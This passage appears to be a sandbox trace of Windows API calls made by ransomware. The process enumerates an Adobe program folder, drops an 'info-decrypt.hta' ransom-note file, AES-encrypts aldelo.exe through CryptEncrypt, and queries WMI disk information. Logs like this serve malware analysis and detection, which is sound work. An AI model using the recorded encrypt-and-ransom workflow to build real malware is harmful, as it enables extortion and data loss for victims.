ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader 10.0", cAlternateFileName="READER~1.0")) returned 1 [0152.412] FindNextFileW (in: hFindFile=0x77b1f0, lpFindFileData=0x6ceeb54 | out: lpFindFileData=0x6ceeb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader 10.0", cAlternateFileName="READER~1.0")) returned 0 [0152.412] FindClose (in: hFindFile=0x77b1f0 | out: hFindFile=0x77b1f0) returned 1 [0152.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceeddc) returned 1 [0152.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceede8) returned 1 [0152.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceee1c) returned 1 [0152.412] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe", nBufferLength=0x105, lpBuffer=0x6cee924, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe", lpFilePart=0x0) returned 0x1c [0152.412] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\", nBufferLength=0x105, lpBuffer=0x6cee8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\", lpFilePart=0x0) returned 0x1d [0152.412] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\*", lpFindFileData=0x6ceeb44 | out: lpFindFileData=0x6ceeb44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xdbcb06e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcb06e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b1f0 [0152.412] FindNextFileW (in: hFindFile=0x77b1f0, lpFindFileData=0x6ceeb54 | out: lpFindFileData=0x6ceeb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xdbcb06e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcb06e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0152.412] FindNextFileW (in: hFindFile=0x77b1f0, lpFindFileData=0x6ceeb54 | out: lpFindFileData=0x6ceeb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8ffba80, ftCreationTime.dwHighDateTime=0x1d5765c, ftLastAccessTime.dwLowDateTime=0xc770d040, ftLastAccessTime.dwHighDateTime=0x1d5889d, ftLastWriteTime.dwLowDateTime=0xc770d040, ftLastWriteTime.dwHighDateTime=0x1d5889d, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="aldelo.exe", cAlternateFileName="")) returned 1 [0152.413] FindNextFileW (in: hFindFile=0x77b1f0, lpFindFileData=0x6ceeb54 | out: lpFindFileData=0x6ceeb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1c72a30, ftCreationTime.dwHighDateTime=0x1d57e7b, ftLastAccessTime.dwLowDateTime=0x7d642d50, ftLastAccessTime.dwHighDateTime=0x1d5c9d2, ftLastWriteTime.dwLowDateTime=0x7d642d50, ftLastWriteTime.dwHighDateTime=0x1d5c9d2, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="far.exe", cAlternateFileName="")) returned 1 [0152.413] FindNextFileW (in: hFindFile=0x77b1f0, lpFindFileData=0x6ceeb54 | out: lpFindFileData=0x6ceeb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader 10.0", cAlternateFileName="READER~1.0")) returned 1 [0152.413] FindNextFileW (in: hFindFile=0x77b1f0, lpFindFileData=0x6ceeb54 | out: lpFindFileData=0x6ceeb54*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0152.413] FindClose (in: hFindFile=0x77b1f0 | out: hFindFile=0x77b1f0) returned 1 [0152.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceeddc) returned 1 [0152.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceede8) returned 1 [0152.413] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\aldelo.exe", nBufferLength=0x105, lpBuffer=0x6cee8dc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\aldelo.exe", lpFilePart=0x0) returned 0x27 [0152.413] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\aldelo.exe", nBufferLength=0x105, lpBuffer=0x6cee8d4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\aldelo.exe", lpFilePart=0x0) returned 0x27 [0152.413] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6cee8dc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\info-decrypt.hta", lpFilePart=0x0) returned 0x2d [0152.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceed3c) returned 1 [0152.413] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6ceedb8 | out: lpFileInformation=0x6ceedb8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceed38) returned 1 [0152.414] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\aldelo.exe", nBufferLength=0x105, lpBuffer=0x6cee8d4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\aldelo.exe", lpFilePart=0x0) returned 0x27 [0152.414] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6cee77c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\info-decrypt.hta", lpFilePart=0x0) returned 0x2d [0152.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceec70) returned 1 [0152.414] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x588 [0152.414] GetFileType (hFile=0x588) returned 0x1 [0152.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceec6c) returned 1 [0152.414] GetFileType (hFile=0x588) returned 0x1 [0152.415] WriteFile (in: hFile=0x588, lpBuffer=0x350b498*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6ceed34, lpOverlapped=0x0 | out: lpBuffer=0x350b498*, lpNumberOfBytesWritten=0x6ceed34*=0x1000, lpOverlapped=0x0) returned 1 [0152.416] WriteFile (in: hFile=0x588, lpBuffer=0x350b498*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x6ceed08, lpOverlapped=0x0 | out: lpBuffer=0x350b498*, lpNumberOfBytesWritten=0x6ceed08*=0x557, lpOverlapped=0x0) returned 1 [0152.416] CloseHandle (hObject=0x588) returned 1 [0152.416] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\aldelo.exe", nBufferLength=0x105, lpBuffer=0x6cee858, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\aldelo.exe", lpFilePart=0x0) returned 0x27 [0152.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceed04) returned 1 [0152.416] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\aldelo.exe" (normalized: "c:\\program files (x86)\\adobe\\aldelo.exe"), fInfoLevelId=0x0, lpFileInformation=0x350c4b4 | out: lpFileInformation=0x350c4b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8ffba80, ftCreationTime.dwHighDateTime=0x1d5765c, ftLastAccessTime.dwLowDateTime=0xc770d040, ftLastAccessTime.dwHighDateTime=0x1d5889d, ftLastWriteTime.dwLowDateTime=0xc770d040, ftLastWriteTime.dwHighDateTime=0x1d5889d, nFileSizeHigh=0x0, nFileSizeLow=0x13a00)) returned 1 [0152.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceed00) returned 1 [0152.416] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\aldelo.exe", nBufferLength=0x105, lpBuffer=0x6cee744, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\aldelo.exe", lpFilePart=0x0) returned 0x27 [0152.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceec38) returned 1 [0152.417] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\aldelo.exe" (normalized: "c:\\program files (x86)\\adobe\\aldelo.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x588 [0152.417] GetFileType (hFile=0x588) returned 0x1 [0152.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceec34) returned 1 [0152.417] GetFileType (hFile=0x588) returned 0x1 [0152.417] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x6ceed40 | out: lpFileSizeHigh=0x6ceed40*=0x0) returned 0x13a00 [0152.417] ReadFile (in: hFile=0x588, lpBuffer=0x350c644, nNumberOfBytesToRead=0x13a00, lpNumberOfBytesRead=0x6ceecec, lpOverlapped=0x0 | out: lpBuffer=0x350c644*, lpNumberOfBytesRead=0x6ceecec*=0x13a00, lpOverlapped=0x0) returned 1 [0152.418] CloseHandle (hObject=0x588) returned 1 [0152.418] CryptAcquireContextW (in: phProv=0x6ceec8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ceec8c*=0x7a8f58) returned 1 [0152.419] CryptGenRandom (in: hProv=0x7a8f58, dwLen=0x10, pbBuffer=0x3520708 | out: pbBuffer=0x3520708) returned 1 [0153.171] CryptImportKey (in: hProv=0x7a8f58, pbData=0x366dcfc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6ceec5c | out: phKey=0x6ceec5c*=0x77ac30) returned 1 [0153.171] CryptContextAddRef (hProv=0x7a8f58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0153.171] CryptContextAddRef (hProv=0x7a8f58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0153.171] CryptDuplicateKey (in: hKey=0x77ac30, pdwReserved=0x0, dwFlags=0x0, phKey=0x6ceec4c | out: phKey=0x6ceec4c*=0x77b4f0) returned 1 [0153.171] CryptContextAddRef (hProv=0x7a8f58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0153.171] CryptSetKeyParam (hKey=0x77b4f0, dwParam=0x4, pbData=0x366dddc*=0x1, dwFlags=0x0) returned 1 [0153.171] CryptSetKeyParam (hKey=0x77b4f0, dwParam=0x1, pbData=0x366dda8, dwFlags=0x0) returned 1 [0153.171] CryptEncrypt (in: hKey=0x77b4f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x366ddec*, pdwDataLen=0x6ceecb8*=0x13a10, dwBufLen=0x13a10 | out: pbData=0x366ddec*, pdwDataLen=0x6ceecb8*=0x13a10) returned 1 [0153.172] CryptEncrypt (in: hKey=0x77b4f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3681820*, pdwDataLen=0x6ceecc0*=0x0, dwBufLen=0x10 | out: pbData=0x3681820*, pdwDataLen=0x6ceecc0*=0x10) returned 1 [0153.176] CryptDestroyKey (hKey=0x77ac30) returned 1 [0153.176] CryptReleaseContext (hProv=0x7a8f58, dwFlags=0x0) returned 1 [0153.176] CryptReleaseContext (hProv=0x7a8f58, dwFlags=0x0) returned 1 [0153.176] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\aldelo.exe", nBufferLength=0x105, lpBuffer=0x6cee730, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\aldelo.exe", lpFilePart=0x0) returned 0x27 [0153.176] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceec24) returned 1 [0153.176] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\aldelo.exe" (normalized: "c:\\program files (x86)\\adobe\\aldelo.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0153.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceda60) returned 1 [0153.180] CoTaskMemAlloc (cb=0x20c) returned 0x6f2e520 [0153.180] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x6f2e520 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0153.180] CoTaskMemFree (pv=0x6f2e520) [0153.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6cee718, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.180] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceec60 | out: ppv=0x6ceec60*=0x72015c) returned 0x0 [0153.181] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceec58 | out: pAptType=0x6ceec58*=1) returned 0x0 [0153.181] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceec5c | out: ppvObject=0x6ceec5c*=0x0) returned 0x80004002 [0153.181] IUnknown:Release (This=0x72015c) returned 0x1 [0153.182] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee5c8 | out: ppv=0x6cee5c8*=0x6737058) returned 0x0 [0153.182] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737058, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee7e0 | out: ppvObject=0x6cee7e0*=0x0) returned 0x80004002 [0153.183] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737058, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee7f4 | out: ppvObject=0x6cee7f4*=0x6738930) returned 0x0 [0153.183] WbemDefPath:IUnknown:Release (This=0x6737058) returned 0x0 [0153.183] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738930, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee414 | out: ppvObject=0x6cee414*=0x6738930) returned 0x0 [0153.183] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738930, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee3d0 | out: ppvObject=0x6cee3d0*=0x0) returned 0x80004002 [0153.183] WbemDefPath:IUnknown:AddRef (This=0x6738930) returned 0x3 [0153.184] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738930, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedd2c | out: ppvObject=0x6cedd2c*=0x0) returned 0x80004002 [0153.184] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738930, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedcdc | out: ppvObject=0x6cedcdc*=0x0) returned 0x80004002 [0153.184] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738930, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedce8 | out: ppvObject=0x6cedce8*=0x77bf78) returned 0x0 [0153.184] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77bf78, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedcf0 | out: pCid=0x6cedcf0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0153.184] WbemDefPath:IUnknown:Release (This=0x77bf78) returned 0x3 [0153.184] CoGetContextToken (in: pToken=0x6cedd48 | out: pToken=0x6cedd48) returned 0x0 [0153.185] CoGetContextToken (in: pToken=0x6cee150 | out: pToken=0x6cee150) returned 0x0 [0153.185] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738930, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee1e0 | out: ppvObject=0x6cee1e0*=0x0) returned 0x80004002 [0153.185] WbemDefPath:IUnknown:Release (This=0x6738930) returned 0x2 [0153.185] WbemDefPath:IUnknown:Release (This=0x6738930) returned 0x1 [0153.185] CoGetContextToken (in: pToken=0x6ceead8 | out: pToken=0x6ceead8) returned 0x0 [0153.185] CoGetContextToken (in: pToken=0x6ceea38 | out: pToken=0x6ceea38) returned 0x0 [0153.185] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738930, riid=0x6ceeb08*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ceeb04 | out: ppvObject=0x6ceeb04*=0x6738930) returned 0x0 [0153.186] WbemDefPath:IUnknown:AddRef (This=0x6738930) returned 0x3 [0153.186] WbemDefPath:IUnknown:Release (This=0x6738930) returned 0x2 [0153.186] WbemDefPath:IWbemPath:SetText (This=0x6738930, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0153.186] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738930, puCount=0x6ceec8c | out: puCount=0x6ceec8c*=0x0) returned 0x0 [0153.186] WbemDefPath:IWbemPath:GetText (in: This=0x6738930, lFlags=2, puBuffLength=0x6ceec88*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec88*=0x20, pszText=0x0) returned 0x0 [0153.186] WbemDefPath:IWbemPath:GetText (in: This=0x6738930, lFlags=2, puBuffLength=0x6ceec88*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec88*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0153.186] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738930, uRequestedInfo=0x0, puResponse=0x6ceec94 | out: puResponse=0x6ceec94*=0xc19) returned 0x0 [0153.186] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738930, puCount=0x6ceec8c | out: puCount=0x6ceec8c*=0x0) returned 0x0 [0153.186] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738930, uRequestedInfo=0x0, puResponse=0x6ceec94 | out: puResponse=0x6ceec94*=0xc19) returned 0x0 [0153.186] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738930, uRequestedInfo=0x0, puResponse=0x6ceec94 | out: puResponse=0x6ceec94*=0xc19) returned 0x0 [0153.186] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738930, puCount=0x6ceec0c | out: puCount=0x6ceec0c*=0x0) returned 0x0 [0153.186] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6ceebf8 | out: puCount=0x6ceebf8*=0x2) returned 0x0 [0153.186] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceebf4*=0x0, pszText=0x0 | out: puBuffLength=0x6ceebf4*=0xf, pszText=0x0) returned 0x0 [0153.186] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceebf4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceebf4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0153.186] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceeba8 | out: ppv=0x6ceeba8*=0x72015c) returned 0x0 [0153.187] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceeba0 | out: pAptType=0x6ceeba0*=1) returned 0x0 [0153.187] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceeba4 | out: ppvObject=0x6ceeba4*=0x0) returned 0x80004002 [0153.187] IUnknown:Release (This=0x72015c) returned 0x1 [0153.188] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee510 | out: ppv=0x6cee510*=0x6736e18) returned 0x0 [0153.312] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e18, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee728 | out: ppvObject=0x6cee728*=0x0) returned 0x80004002 [0153.312] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e18, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee73c | out: ppvObject=0x6cee73c*=0x67389a0) returned 0x0 [0153.312] WbemDefPath:IUnknown:Release (This=0x6736e18) returned 0x0 [0153.312] WbemDefPath:IUnknown:QueryInterface (in: This=0x67389a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee35c | out: ppvObject=0x6cee35c*=0x67389a0) returned 0x0 [0153.312] WbemDefPath:IUnknown:QueryInterface (in: This=0x67389a0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee318 | out: ppvObject=0x6cee318*=0x0) returned 0x80004002 [0153.312] WbemDefPath:IUnknown:AddRef (This=0x67389a0) returned 0x3 [0153.312] WbemDefPath:IUnknown:QueryInterface (in: This=0x67389a0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedc74 | out: ppvObject=0x6cedc74*=0x0) returned 0x80004002 [0153.312] WbemDefPath:IUnknown:QueryInterface (in: This=0x67389a0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedc24 | out: ppvObject=0x6cedc24*=0x0) returned 0x80004002 [0153.312] WbemDefPath:IUnknown:QueryInterface (in: This=0x67389a0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedc30 | out: ppvObject=0x6cedc30*=0x77bfa8) returned 0x0 [0153.312] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77bfa8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedc38 | out: pCid=0x6cedc38*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, 